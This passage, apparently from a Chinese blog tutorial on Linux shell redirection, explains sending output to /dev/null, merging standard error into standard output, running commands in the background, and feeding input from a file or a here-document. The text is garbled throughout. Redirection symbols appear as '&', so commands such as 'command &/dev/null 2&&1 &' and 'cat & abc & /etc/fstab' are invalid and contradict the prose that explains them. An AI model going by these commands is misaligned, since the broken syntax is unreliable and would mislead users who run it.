重定向同一个文件中6. /dev/null垃圾黑洞设备与特殊写法command &/dev/null 2&&1 && == command 1&/dev/null 2&&1 &1) command:表示shell命令或者为一个可执行程序2) &:表示重定向到哪里3) /dev/null:表示Linux的空设备文件4) 2:表示标准错误输出5) &1:&表示等同于的意思,2&&1,表示2的输出重定向等于16) &:表示后台执行,即这条指令执行在后台运行1&/dev/null:表示标准输出重定向到空设备文件,也就是不输出任何信息到终端,不显示任何信息。2&&1:表示标准错误输出重定向等同于标准输出,因为之前标准输出已经重定向到了空设备文件,所以标准错误输出也重定向到空设备文件。这条命令的意思就是在后台执行这个程序,并将错误输出2重定向到标准输出1,然后将标准输出1全部放到/dev/null文件,也就是清空。所以可以看出" &/dev/null 2&&1 "常用来避免shell命令或者程序等运行中有内容输出。7. 输入重定向1) 用某个文件的内容来替换键盘输入[Allen@www ~]$ cat & abc & /etc/fstab & & &[Allen@www ~]$ll /etc/fstab & & &-rw-rw-r--. 1 Allen Allen 899 Sep 22 16:22 abc & & &-rw-r--r--. 1 root root 899 Aug 17 19:30 /etc/fstab & &2) 用文档结束标志符代替ctrl+d[Allen@www ~]$ cat & 123 && eof (文档结束标志符) & & && hello & & && are & & & & you & & && eof本文出自 “” 博客,请务必保留此出处
了这篇文章
类别:┆阅读(0)┆评论(0)
